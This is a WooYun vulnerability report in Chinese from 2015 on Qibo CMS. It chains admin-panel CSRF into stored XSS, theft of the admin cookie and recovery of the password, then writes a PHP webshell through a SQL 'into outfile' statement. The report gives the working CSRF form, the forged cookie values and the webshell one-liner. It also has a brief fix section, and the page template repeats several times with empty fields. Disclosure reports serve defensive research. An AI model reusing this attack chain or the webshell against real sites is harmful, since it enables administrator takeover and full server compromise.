qibo通杀csrf+存储xss+分析明文账号密码进后台+成功getshell

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0101818

漏洞标题：qibo通杀csrf+存储xss+分析明文账号密码进后台+成功getshell

漏洞作者： Ader_duo

提交时间：2015-03-20 16:10

修复时间：2015-06-23 16:13

公开时间：2015-06-23 16:13

漏洞类型：CSRF

危害等级：中

自评Rank：10

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-03-20：细节已通知厂商并且等待厂商处理中
2015-03-25：厂商主动忽略漏洞，细节向第三方安全合作伙伴开放
2015-05-19：细节向核心白帽子及相关领域专家公开
2015-05-29：细节向普通白帽子公开
2015-06-08：细节向实习白帽子公开
2015-06-23：细节向公众公开

简要描述：

csrf+xss+成功getshell以整站系统为例

详细说明：

后台无csrf防御，首先，看下全局过滤。全局过滤目录结构admin/index.php-admin/global.php-inc/common.inc.php这里是重点

$_POST=Add_S($_POST); 
$_GET=Add_S($_GET);
$_COOKIE=Add_S($_COOKIE);
function Add_S($array){//过滤
     foreach($array as $key=>$value){
          @eregi("['\\\"]+",$key) && die('ERROR KEY!');
          if(!is_array($value)){              
               $value=str_replace("&#x","& # x",$value);     //过滤一些不安全字符
               $value=preg_replace("/eval/i","eva l",$value);     //将eval替换为eva l
               !get_magic_quotes_gpc() && $value=addslashes($value);//转义
               $array[$key]=$value;
          }else{
               $array[$key]=Add_S($array[$key]);
          }
     }
     return $array;
}

综上：post，get，cookie过来的参数进行过滤，但是没有过滤xss过滤。对eval进行替换但是还有别的函数有同样功能，还是可以插入一句话进去
csrf：后台-系统功能-全局参数设置
利用脚本：1.php

<form action="http://127.0.0.1/v7~/admin/index.php?lfj=center&action=config" method="post" name="c">
<input type="text" name="webdbs[copyright]" value="<script src=http://127.0.0.1/xss/probe.js></script>"/>
</form> <script> document.c.submit(); </script>

参数webdbs[copyright]是网页底部版权信息。在前台的每个页面都会出现。
http://127.0.0.1/xss/probe.js 这是我本地的探针调用本地xss探针probe,js。探针里http_server = "http://127.0.0.1/3/test.php?c="，可以在服务器。test接收参数C,生成页面probe_data.html.写入接收到的数据。cookie就在里面。
管理员在登录状态下访问主站任何页面都会中招。获取到的cookie如下：

1%09admin%09VwgAUgpRBwpUVgQAAFRZD1YHXF0GWVJXUlVcVQICW1c%3D94606de1fd%09是跳格键 %3D是=所以1 admin VwgAUgpRBwpUVgQAAFRZD1YHXF0GWVJXUlVcVQICW1c=94606de1fd随意注册一账户。用户名111 登录之后编辑passport内容为Admin=1 VwgAUgpRBwpUVgQAAFRZD1YHXF0GWVJXUlVcVQICW1c=94606de1fd

编辑之后刷新页面。

这样是可以成功登陆前台的，登陆后台需要Admin,adminID,passport同样方式编辑，刷新之后
然后进入后台。
点击服务器信息。看到网站绝对路径 DOCUMENT_ROOT D:/wamp/wamp/www/
系统功能-数据库工具

输入sql语句：
select '<?php @assert($_POST[password]);?>' into outfile 'D:/wamp/wamp/www/cc.php'

成功插入一句话。菜刀连接

漏洞证明：

其实xss获取到的cookie有一定时间的，但是我们可以从获取到cookie来推算原本的账号密码。
inc\common.inc.php

//同步后台登录
if($_COOKIE["adminID"]&&$detail=mymd5($_COOKIE["adminID"],'DE',
$onlineip)){
    unset($_uid,$_username,$_password);
    list($_uid,$_username,$_password)=explode("\t",$detail);
    $_uid = intval($_uid);
    $lfjdb = $userDB->get_allInfo($_uid);
    if(!$lfjdb['password'] || $lfjdb['password']!=$_password){
        unset($lfjdb);
    }
}

可知$detail经过\t分隔之后为uid username，password.
计算mymd5($_COOKIE["adminID"],'DE',$onlineip)
看mymd5()函数-是加密解密函数：

function mymd5($string,$action="EN",$rand=''){ //字符串加密和解密
    global $webdb;
    $secret_string = $webdb[mymd5].$rand.'5*j,.^&;?.%#@!'; //绝密字符串,
可以任意设定
    if(!is_string($string)){
        $string=strval($string);
    }
    if($string==="") return "";
    if($action=="EN") $md5code=substr(md5($string),8,10);
    else{
        $md5code=substr($string,-10);
        $string=substr($string,0,strlen($string)-10);
    }
    //$key = md5($md5code.$_SERVER["HTTP_USER_AGENT"].$secret_string);
    $key = md5($md5code.$secret_string);
    $string = ($action=="EN"?$string:base64_decode($string));
    $len = strlen($key);
    $code = "";
    for($i=0; $i<strlen($string); $i++){
        $k = $i%$len;
        $code .= $string[$i]^$key[$k];
    }
    $code = ($action == "DE" ? (substr(md5($code),8,10)==$md5code?
$code:NULL) : base64_encode($code)."$md5code");
    return $code;
}

cookie=VGxWUVoIVz5QVwAGBlVQXFYABQRVUQJTAlVdWwMCA1RRBA8FBgdaBA==638eb521ba
mymd5
('VGxWUVoIVz5QVwAGBlVQXFYABQRVUQJTAlVdWwMCA1RRBA8FBgdaBA==638eb521ba','127.0.0.1')
得：

密码为MD5加密，解密为admin 用户名passport第二个参数admin

修复方案：

后台进行敏感操作时候要加上token。
最好在inc/common.php页面对获取的值进行xss过滤，也对php一句话别的函数进行过滤

版权声明：转载请注明来源 Ader_duo@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2015-06-23 16:13

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0101818

漏洞标题：qibo通杀csrf+存储xss+分析明文账号密码进后台+成功getshell

相关厂商：齐博CMS

漏洞作者： Ader_duo

提交时间：2015-03-20 16:10

修复时间：2015-06-23 16:13

公开时间：2015-06-23 16:13

漏洞类型：CSRF

危害等级：中

自评Rank：10

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Ader_duo@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0101818

漏洞标题：qibo通杀csrf+存储xss+分析明文账号密码进后台+成功getshell

相关厂商：齐博CMS

漏洞作者： Ader_duo

提交时间：2015-03-20 16:10

修复时间：2015-06-23 16:13

公开时间：2015-06-23 16:13

漏洞类型：CSRF

危害等级：中

自评Rank：10

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0101818"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Ader_duo@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：